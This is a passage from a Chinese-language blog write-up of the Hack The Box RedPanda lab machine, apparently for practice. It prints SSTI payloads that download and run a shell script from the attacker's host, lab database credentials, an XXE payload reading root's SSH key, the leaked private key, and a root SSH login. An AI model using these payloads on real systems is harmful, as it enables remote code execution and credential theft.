class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;curl&lt;YOUR_LOCAL_IP&gt;:8000/shell.sh -o /tmp/shell.sh&#x27;).getInputStream())&#125;</span><br><span class="line"></span><br><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;chmod +x /tmp/shell.sh&#x27;).getInputStream())&#125;</span><br><span class="line"></span><br><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;/bin/bash /tmp/shell.sh&#x27;).getInputStream())&#125;</span><br><span class="line"></span><br><span class="line">[ ** SNIP ** ]</span><br><span class="line">Class.forName(&quot;com.mysql.cj.jdbc.Driver&quot;);</span><br><span class="line">conn = DriverManager.getConnection(&quot;jdbc:mysql://localhost:3306/red_panda&quot;,</span><br><span class="line">&quot;woodenk&quot;, &quot;RedPandazRule&quot;);</span><br><span class="line">[ ** SNIP ** ]</span><br><span class="line"></span><br><span class="line">public static boolean isImage(String filename) &#123;</span><br><span class="line">    if (filename.contains(&quot;.jpg&quot;))</span><br><span class="line">        return true;</span><br><span class="line">    return false;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">public static Map parseLog(String line) &#123;</span><br><span class="line">    String[] strings = line.split(&quot;\\\\&quot;, 4);</span><br><span class="line">    Map map = new HashMap&lt;&gt;();</span><br><span class="line">    map.put(&quot;status_code&quot;, strings[0]);</span><br><span class="line">    map.put(&quot;ip&quot;, strings[1]);</span><br><span class="line">    map.put(&quot;user_agent&quot;, strings[2]);</span><br><span class="line">    map.put(&quot;uri&quot;, strings[3]);</span><br><span class="line">    return map;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">public static String getArtist(String uri) throws IOException, JpegProcessingException</span><br><span class="line"> &#123;</span><br><span class="line">    String fullpath = &quot;/opt/panda_search/src/main/resources/static&quot; + uri;</span><br><span class="line">    File jpgFile = new File(fullpath);</span><br><span class="line">    Metadata metadata = JpegMetadataReader.readMetadata(jpgFile);</span><br><span class="line">    for(Directory dir : metadata.getDirectories())</span><br><span class="line">     &#123;</span><br><span class="line">        for(Tag tag : dir.getTags())</span><br><span class="line">         &#123;</span><br><span class="line">            if(tag.getTagName() == &quot;Artist&quot;)</span><br><span class="line">             &#123;</span><br><span class="line">                return tag.getDescription();</span><br><span class="line">             &#125;</span><br><span class="line">         &#125;</span><br><span class="line">     &#125;</span><br><span class="line">    return &quot;N/A&quot;;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line">String xmlPath = &quot;/credits/&quot; + artist + &quot;_creds.xml&quot;;</span><br><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;&gt;</span><br><span class="line">&lt;!DOCTYPE author [&lt;!ENTITY xxe SYSTEM &#x27;file:///root/.ssh/id_rsa&#x27;&gt;]&gt;</span><br><span class="line">&lt;credits&gt;</span><br><span class="line">    &lt;author&gt;&amp;xxe;&lt;/author&gt;</span><br><span class="line">        &lt;image&gt;</span><br><span class="line">            &lt;uri&gt;/img/greg.jpg&lt;/uri&gt;</span><br><span class="line">            &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">        &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">        &lt;uri&gt;/img/hungy.jpg&lt;/uri&gt;</span><br><span class="line">        &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">        &lt;uri&gt;/img/smooch.jpg&lt;/uri&gt;</span><br><span class="line">        &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">        &lt;uri&gt;/img/smiley.jpg&lt;/uri&gt;</span><br><span class="line">        &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;totalviews&gt;2&lt;/totalviews&gt;</span><br><span class="line">&lt;/credits&gt;</span><br><span class="line"></span><br><span class="line">woodenk@redpanda:/tmp$ cat hax_creds.xml</span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE author&gt;</span><br><span class="line">&lt;credits&gt;</span><br><span class="line">    &lt;author&gt;-----BEGIN OPENSSH PRIVATE KEY-----</span><br><span class="line">    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW</span><br><span class="line">    QyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQAAAJBRbb26UW29</span><br><span class="line">    ugAAAAtzc2gtZWQyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQ</span><br><span class="line">    AAAECj9KoL1KnAlvQDz93ztNrROky2arZpP8t8UgdfLI0HvN5Q081w1miL4ByNky01txxJ</span><br><span class="line">    RwNRnQ60aT55qz5sV7N9AAAADXJvb3RAcmVkcGFuZGE=</span><br><span class="line">    -----END OPENSSH PRIVATE KEY-----&lt;/author&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">    &lt;uri&gt;/img/greg.jpg&lt;/uri&gt;</span><br><span class="line">    &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">    &lt;uri&gt;/img/hungy.jpg&lt;/uri&gt;</span><br><span class="line">    &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">    &lt;uri&gt;/img/smooch.jpg&lt;/uri&gt;</span><br><span class="line">    &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">    &lt;uri&gt;/img/smiley.jpg&lt;/uri&gt;</span><br><span class="line">    &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;totalviews&gt;3&lt;/totalviews&gt;</span><br><span class="line">&lt;/credits&gt;</span><br></pre></td></tr></table></figure>
<p>我们可以复制SSH私钥到本机的文件，修改其权限为600，以便于可以被SSH工具使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 600 id_rsa</span><br></pre></td></tr></table></figure>
<p>接着，我们可以成功以root身份通过SSH登录。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i id_rsa root@10.10.11.170</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671358970322.png" alt="file" /></p>
<p>root的flag可以在/root/root.txt文件里找到。</p>
</div><div class="tags"><a href="/tags/htb"><i class="fa fa-tag">htb</i></a></div><div class="post-nav"><a class="pre" href="/p/2023-new-beginning/">2023，“全力”拥抱Web3（安全）</a><a class="next" href="/p/htb-derailed/">【全网首发】由举报笔记引发的一场“血案”——Derailed靶机</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="author-info"><a class="info-avatar" href="/about-me/" title="关于"><img class="nofancybox" src="/img/avatar.png"/></a><p>stay hungry, stay foolish</p><a class="info-icon" href="https://twitter.com/gaoxiaodiao" title="Twitter" target="_blank" style="margin-inline:5px"> <i class="fa fa-twitter-square" style="margin-inline:5px"></i></a><a class="info-icon" href="mailto:admin@domain.com" title="Email" target="_blank" style="margin-inline:5px"> <i class="fa fa-envelope-square" style="margin-inline:5px"></i></a><a class="info-icon" href="https://github.com/gaoxiaodiao" title="Github" target="_blank" style="margin-inline:5px"> <i class="fa fa-github-square" style="margin-inline:5px"></i></a><a class="info-icon" href="/atom.xml" title="RSS" target="_blank" style="margin-inline:5px"> <i class="fa fa-rss-square" style="margin-inline:5px"></i></a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/mac%E5%BC%80%E5%8F%91/" style="font-size: 15px;">mac开发</a> <a href="/tags/linux%E5%BC%80%E5%8F%91/" style="font-size: 15px;">linux开发</a> <a href="/tags/%E5%BF%83%E8%B7%AF%E5%8E%86%E7%A8%8B/" style="font-size: 15px;">心路历程</a> <a href="/tags/%E5%89%AF%E4%B8%9A%E6%8E%A2%E7%B4%A2/" style="font-size: 15px;">副业探索</a> <a href="/tags/%E5%B7%A5%E6%AC%B2%E5%96%84%E5%85%B6%E4%BA%8B-%E5%BF%85%E5%85%88%E5%88%A9%E5%85%B6%E5%99%A8/" style="font-size: 15px;">工欲善其事,必先利其器</a> <a href="/tags/Foundry/" style="font-size: 15px;">Foundry</a> <a href="/tags/PowerShell/" style="font-size: 15px;">PowerShell</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/ChatGPT%E6%97%A0%E6%B3%95%E5%81%9A%E5%88%B0%E7%9A%84%E4%BA%8B%E6%83%85/" style="font-size: 15px;">ChatGPT无法做到的事情</a> <a href="/tags/%E5%8E%9F%E5%A7%8B%E7%9F%A5%E8%AF%86%E7%A7%AF%E7%B4%AF/" style="font-size: 15px;">原始知识积累</a> <a href="/tags/%E7%AC%AC%E4%B8%89%E6%96%B9%E5%BA%93%E7%BC%96%E8%AF%91/" style="font-size: 15px;">第三方库编译</a> <a href="/tags/%E5%BC%80%E5%8F%91-%E4%BB%A3%E7%A0%81/" style="font-size: 15px;">开发&代码</a> <a href="/tags/%E7%AC%94%E8%AE%B0/" style="font-size: 15px;">笔记</a> <a href="/tags/%E5%A4%AA%E7%9B%91/" style="font-size: 15px;">太监</a> <a href="/tags/%E6%95%85%E9%9A%9C%E6%8E%92%E9%99%A4-%E4%BF%AE%E5%A4%8D/" style="font-size: 15px;">故障排除/修复</a> <a href="/tags/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" style="font-size: 15px;">奇技淫巧</a> <a href="/tags/%E9%80%86%E5%90%91-%E7%A0%B4%E8%A7%A3/" style="font-size: 15px;">逆向&破解</a> <a href="/tags/%E5%85%85%E7%94%B5%E4%BC%9A%E5%91%98%E4%B8%93%E5%B1%9E/" style="font-size: 15px;">充电会员专属</a> <a href="/tags/%E7%8B%AC%E7%AB%8B%E5%BC%80%E5%8F%91/" style="font-size: 15px;">独立开发</a> <a href="/tags/AI%E7%BC%96%E7%A8%8B%E6%B5%81%E6%B0%B4%E7%BA%BF%E7%B3%BB%E5%88%97/" style="font-size: 15px;">AI编程流水线系列</a> <a href="/tags/htb/" style="font-size: 15px;">htb</a> <a href="/tags/%E6%9E%B6%E6%9E%84%E5%B8%88%E4%B9%8B%E8%B7%AF/" style="font-size: 15px;">架构师之路</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/p/turn-bugfix-logs-into-assets_v2/">bugfix-doc skill：把 bugfix 从记录变成资产</a></li><li class="post-list-item"><a class="post-list-link" href="/p/ui-exploration-pipeline-workflow/">我将UI多样化探索做成了一个流水线</a></li><li class="post-list-item"><a class="post-list-link" href="/p/how-to-build-long-running-agent-tasks-zhukong-skill-ralph-loop-part-1/">如何实现Agent长时间执行任务（一）：Zhukong Skill,Ralph Loop与oh-my-codex</a></li><li class="post-list-item"><a class="post-list-link" href="/p/05_ghostvm-architecture-iteration-5/">GhostVM架构设计迭代记录(五)：结语</a></li><li class="post-list-item"><a class="post-list-link" href="/p/04_ghostvm-architecture-iteration-4/">GhostVM架构设计迭代记录(四)：公式化架构精简</a></li><li class="post-list-item"><a class="post-list-link" href="/p/03_ghostvm-architecture-iteration-3/">GhostVM架构设计迭代记录(三)：公式化架构调整</a></li><li class="post-list-item"><a class="post-list-link" href="/p/maximize-chatgpt-plus-pro-membership-value/">如何最大化程度榨干ChatGPT的20/200刀会员?</a></li><li class="post-list-item"><a class="post-list-link" href="/p/02_ghostvm-architecture-iteration-2/">GhostVM架构设计迭代记录(二)：LLM在架构设计方面的限制</a></li><li class="post-list-item"><a class="post-list-link" href="/p/01_ghostvm-architecture-iteration-1/">GhostVM架构设计迭代记录(一)：背景、软件工程师视角与架构师视角</a></li><li class="post-list-item"><a class="post-list-link" href="/p/lady-luck-is-smiling-2/">幸运女神在微笑（二）</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://gaoxiaodiao.com/" title="高小调博客" target="_blank">高小调博客</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2026 <a href="/." rel="nofollow">高小调博客.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/latest/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0"></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/latest/jquery.fancybox.min.css"><script type="text/javascript" src="/js/love.js?v=1.0.0"></script><script type="text/javascript" src="/js/copycode.js?v=1.0.0" successtext="复制成功！"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=1.0.0"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>